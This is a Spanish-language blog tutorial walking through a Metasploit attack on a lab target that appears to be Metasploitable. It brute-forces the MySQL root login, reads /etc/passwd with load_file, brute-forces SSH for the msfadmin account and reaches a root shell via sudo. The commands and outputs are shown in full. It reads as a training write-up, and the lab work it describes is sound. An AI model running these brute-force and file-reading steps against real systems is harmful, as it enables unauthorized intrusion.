11 jun. 2010

Intrusión a MySQL y luego obteniendo Shell Root

Hola hoy les haré un pequeño tutorial con metasploit para hacer una intrusión a una base de datos mysql para después poder obtener shell root por ssh

Empecemos?

Escaneamos con NMAP los puertos:
nmap -sV --allports --version-all 192.168.1.34
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

Acá lo que nos interesa:
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5

Abramos metasploit
Usaremos el auxiliary
mysql_login
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

Agregamos el host:
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

Ahora agregamos con el user que se va a loguear yo en mi caso voy a probar con root:
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root

Y ahora voy a usar la opción PASS_FILE para hacer un brute force :P al login y intentar longuearse con las contraseñas :P
msf auxiliary(mysql_login) > set PASS_FILE /home/linuxfer/Escritorio/pass.txt
PASS_FILE => /home/linuxfer/Escritorio/pass.txt

Ejecutamos el axuriliary:
msf auxiliary(mysql_login) > run
[*] 192.168.1.34:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.1.34:3306 Trying username:'root' with password:''
[*] 192.168.1.34:3306 failed to login as 'root' with password ''
[*] 192.168.1.34:3306 Trying username:'root' with password:'murderking'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'murderking'
[*] 192.168.1.34:3306 Trying username:'root' with password:'duraznin'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'duraznin'
[*] 192.168.1.34:3306 Trying username:'root' with password:'pete'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'pete'
[*] 192.168.1.34:3306 Trying username:'root' with password:'oxono'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'oxono'
[*] 192.168.1.34:3306 Trying username:'root' with password:'puto'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'puto'
[*] 192.168.1.34:3306 Trying username:'root' with password:'root'
[+] 192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) > 

Como vemos se logueo con root root
192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'

Abrimos una nueva terminal y ejecutamos
mysql -h 192.168.1.34 -u root -p root
-h: host
-u:usuario
-p:password

[email protected]:~$ mysql -h 192.168.1.34 -u root -proot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 38
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Ya estamos dentro del server mysql
mysql> show grants;
+--------------------------------------------------------------------------------------------------------------------------------+
| Grants for [email protected]%                                                                                                              |
+--------------------------------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' WITH GRANT OPTION |
+--------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

Veamos los roots :P
mysql> select load_file('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false

Mmmmmm.. parece que el usuario es msfadmin volvamos a metasploit ahora usaremos el auxiliary
scanner/ssh/ssh_login
msf auxiliary(mysql_login) > use scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

Agregamos host:
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

Agregamos el user:
msf auxiliary(ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin

Agregamos las pass con las que queremos que haga el brute force
msf auxiliary(ssh_login) > set PASS_FILE /home/linuxfer/Escritorio/pass2.txt
PASS_FILE => /home/linuxfer/Escritorio/pass2.txt

Ejecutamos el auxiliary:
msf auxiliary(ssh_login) > run

[*] 192.168.1.34:22 - SSH - Starting buteforce
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: ''
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':''
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'jaja'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'jaja'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pete'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pete'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'tutorial'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'tutorial'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'ddlr'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'ddlr'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pam'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pam'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'paquero'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'paquero'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'duraznin'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'duraznin'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Que tal se logueo con msfadmin y msfadmin:
*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '

Bueno ya esta creada la sessión con la shell veamos:
Active sessions
===============

  Id  Type   Information                              Connection
  --  ----   -----------                              ----------
  1   shell  SSH msfadmin:msfadmin (192.168.1.34:22)  192.168.1.33:58907 -> 192.168.1.34:22
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
pwd
/home/msfadmin
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Bien ahora abramos una nueva terminal y conectemosno por ssh para obtener shell root
[email protected]:~$ ssh [email protected]
The authenticity of host '192.168.1.34 (192.168.1.34)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.34' (RSA) to the list of known hosts.
[email protected]'s password: 

Nos pide pass recuerden que es msfadmin tipeamos y
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Thu Jun 10 15:15:54 2010
[email protected]:~$ 

Ya tenemos shell ahora solo tenemos que tipear sudo -i la pass msfadmin y ya tenemos shell root
[email protected]:~$ sudo -i
[sudo] password for msfadmin: 
[email protected]:~# id
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# 

Game over (?)

Bueno espero que les halla gustado y hallan entendido bien perdon por no hacer un video pero es que tengo unos problemillas :P


Autor: linuxfer
Fuente: http://linuxfer.diosdelared.com/

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (5) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (9) Cryptsetup (1) DDoS (11) DEF CON (3) DEFCON (6) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (9) PDF (6) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (9) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (4) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (144) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (73) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (47) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (15) Youtube (1)

 
biz.